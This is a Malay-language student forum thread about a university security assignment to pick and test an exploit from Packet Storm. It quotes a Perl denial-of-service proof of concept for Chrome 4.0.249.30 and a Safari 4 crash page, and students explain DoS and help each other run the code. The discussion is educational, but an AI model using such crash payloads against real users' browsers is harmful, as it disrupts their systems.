security : Google Chrome version 4.0.249.30 denial of service proof of concept exploit.

salam wbt..

sem ni aku bru amek subject ITT450. security..
nk minx jasa baik korang sume bagi pendapat dgn soalan ni..
aku x faham ape pn.. ape yg patut aku buat?
harap membantu.

http://www.packetstormsecurity.org/1001-exploits/index6.html
googlechrome-dos.txt
Description:
Google Chrome version 4.0.249.30 denial of service proof of concept exploit.


#!/usr/bin/perl
#google chrome 4.0.249.30 DoS PoC
#
#
#Author: Teo Manojlovic
#
#Info: In ordinary cases browser would redirect to "http://www.google.com"
#but in this case browser will report error for something that should
#be possible and is possible on other browsers.
#
#
#
#I would like to thank Jeremy Brown who made very nice fuzzer for browser
#
#
#
#
#
#
#
#Ipak lik nije tolika seljacina koliko sam mislio da je, jer mu pdf fuzzer malo suxa


$file="poc.html";
$poc='a/' x 10000000;
open(myfile,">>$file");
print myfile '<head><meta http-equiv="refresh" content="1; url=http://www.google.com"></head>';
print myfile "<body alink=";
print myfile $poc;
print myfile '">';
close(myfile);
print "Finished\n";

TQ guys..

ahfat797 wrote:salam wbt..

sem ni aku bru amek subject ITT450. security..
nk minx jasa baik korang sume bagi pendapat dgn soalan ni..
aku x faham ape pn.. ape yg patut aku buat?
harap membantu.

aku xpham ape yg ko nak tnye sbnrnye ni
ko xtau nk run perl script ke xtau ape itu dos?

btw, script tu akan generate file poc.html yg mne kandungan dia:

<head><meta http-equiv="refresh" content="1; url=http://www.google.com"></head><body alink=a/">

dlm file yg di generate tu, a/ 10000000 kali. aku xdpt reproduce keadaan tu sbb aku xde chrome versi yg vulnerable tersebut. Tp basically, browser chrome yg vulnerable tersebut akan crash sbb xckup resource nk handle malformed code yg ade dlm file tersebut. sedikit bacaan berkenaan browser dos:
http://everything2.com/title/Web+browser+denial-of-service+attacks

salam bro johnburn..
ape sebenarnye vulnerable tu?

ape mksd sebenar soalan ni?
Google Chrome version 4.0.249.30 denial of service proof of concept exploit.

n mcm mane nk run perl script tu?

n bole terang kn ckit mksd dos?

http://everything2.com/title/Web+browser+denial-of-service+attacks
aku da bace, tp x faham sgt..


TQ bro, maaf bnyk tanye, bru belajar =)

untuk run script perl, ko kne install perl. bleh pkai yg ni:
http://www.activestate.com/activeperl/

apabila ko runkn script perl tu, dia akan hasilkn file ni (download dan extract file zip ni):
http://www.4shared.com/file/211884612/3017f198/pochtml.html

Denial of service merupakan satu teknik/serangan yg digunakan yang menghalang legitimate users dari mendapat akses kepada service/resource atau info yg spttnya. Satu contoh mudah, attacker dpt menghalang ko dr access ke sesuatu website dgn dosing server website tu samada dgn cara flooding server site tu dgn request dr attcker atau dgn cara len. so server akan xckup resource untuk handle request dr ko.

sekarang, cuba ko test bkak file poc.html yg aku bg atas tu dlm chrome versi 4.0.249.30 dan tgk ape jd. spttnye browser tersebut akan crash sbb xcukup resource untuk handle malformed code yg ada dlm file tersebut.

http://blog.ncircle.com/blogs/vert/archives/2008/06/browser_denial_of_service_does.html

bro johnburn,
link install perl ni xley pun..
http://www.activestate.com/activeperl/
kuar msg:
This installation package could not be opened.
Contact the application vendor to verify that this is a valid Windows installer package.

pkai os ape?

johnburn wrote:pkai os ape?

XP bro

kalau aku run pochtml.html kt chrome versi 4.0.249.30
http://www.4shared.com/file/211884612/3017f198/pochtml.html
jd mcm ni ke?

https://2img.net/r/ihimizer/img718/8558/googlechromepoc.png

yeah dia akan crash mcm tu
cube run kt latest version chrome xsilap aku v 5 ke atas
spttnya dh xcrash dan die akan redirect ke page google pas run poc.html tu.

hehe, ntah2 ko kelas network security dengan aku ..

anyway, dh dpt instal perl blom?

johnburn wrote:anyway, dh dpt instal perl blom?

xdpt lg..
ade link lain x?

hampeh wrote:hehe, ntah2 ko kelas network security dengan aku ..

ckp la nik mariza lectrer ko?
ke bro ali?

edit:john burn , alang2 ko kat sini nak tanya sikit ... selalu exploit kat packetstormsecurity tu 100% boleh jalan ke ? pasal aku try tak dapat. mungkin version safari aku lain agaknya..

sori aku silap edit post ko. septtnya nk tkan quote haha
-johnburn-

hampeh wrote:assignment dorang dua tu sama ke ?pn nik mariza aku nyer lecturer.

haha, same class mehh..
asgmnt kt packetstormsecurity.org
sape ea ko?

ahfat797 wrote:
xdpt lg..
ade link lain x?

pastikan ko download versi yg btol. kl windows ko 32 bit, download yg x86 tu. try download blk mne tau td tu download die corrupt ke ape. kl still xleh, try update windows installer:
http://support.microsoft.com/kb/893803

err sbnrnye ape assignment korang ni? care to share?

hampeh wrote:edit:john burn , alang2 ko kat sini nak tanya sikit ... selalu exploit kat packetstormsecurity tu 100% boleh jalan ke ? pasal aku try tak dapat. mungkin version safari aku lain agaknya..

yang ada kt packetstorm tu biasanya yg dh di test dan biasanya dh kuar patch pn. so kl ko nk test jd x, ko kne test la dgn version yg vulnarable seperti yg di letakkan dalm penerangan dia.

still tak jadik . walaupun aku try .. kalau tengok code dia simple je + aku da pakai safari 4.0 dari filehippo.

Code:

###################################################################
# Safari 4 Remote Crash Vulnerability
###################################################################
Vulnerability:
Because this is a test Safari 4 browser's memory handling that end, we have created a test page document, and its code is:
<html>
<code dir= “/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X
/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X
/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X
/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X
/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X
/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X/X” >
</html>
Open file by Safari 4 , Safari 4 browser crashed!
###################################################################
# Discoverd By: Securitylab.ir
# Website: http://securitylab.ir
# Contacts: admin[at]securitylab.ir & info@securitylab[dot]ir
###################################################################




err sbnrnye ape assignment korang ni? care to share?

Kena pilih satu exploit kat packetstorm tu pastu try sendiri + terangkan kat lecturer nih , kalau aku ingat lagi la . haha

nasir..
ko post kt ilearn 5.44pm
better ko inform dgn pn, sebab die ckp sblum kul 5.00pm,
takut die x approve

hampeh wrote:still tak jadik . walaupun aku try .. kalau tengok code dia simple je + aku da pakai safari 4.0 dari filehippo.

Kena pilih satu exploit kat packetstorm tu pastu try sendiri + terangkan kat lecturer nih , kalau aku ingat lagi la . haha

try bukak link ni ngan safari 4 yg ko install tu dan tgk crash x:
http://www.zongeek.net/safari.html

mcm2 la budak IT kn

aiseh kantoi nama sebenar .. kuikui. Sori menyemak thread ko + menyusahkan pulak john burn nak menjawab.

ko post kt ilearn 5.44pm
better ko inform dgn pn, sebab die ckp sblum kul 5.00pm,
takut die x approve

Ilearn tak dapat masuk , nak post pun slow hari tu .. huhu..

johnburn wrote:
try bukak link ni ngan safari 4 yg ko install tu dan tgk crash x:
http://www.zongeek.net/safari.html

Tak jadi apa2,nampak page kosong je sama macam aku test .

mcm2 la budak IT kn

edit: termasuk yang ni dah 2 dah safari 4 punya exploit tak jalan , lagi satu pakai javascript. Dari sini safari 4 dos source link

hampeh wrote:
edit: termasuk yang ni dah 2 dah safari 4 punya exploit tak jalan , lagi satu pakai javascript. Dari sini safari 4 dos source link

aku xdpt nk pastikan sbb aku xde safari. sebolehnya kl nk reproduce keadaan tu, ko kne set up envrmnt yg lbh kurang same cm yg exploit tu di test. cntoh cm kt link tu, die test kt Safari 4.0, Windows XP SP3

Hmm.. okeh aku kena try pakai sp3 sekarang ni pakai sp2(huhu) . Tq membantu , sori kacau thread tuan tanah .

ni link kalau ko nak try safari 4 john burn , sama macam dalam yang 2nd exploit
http://www.filehippo.com/download_safari/5793/

no hal. kl xjd gak, cari la exploit len
melambak kt packetstorm tu
yg penting ko kne tau knapa jd cmtu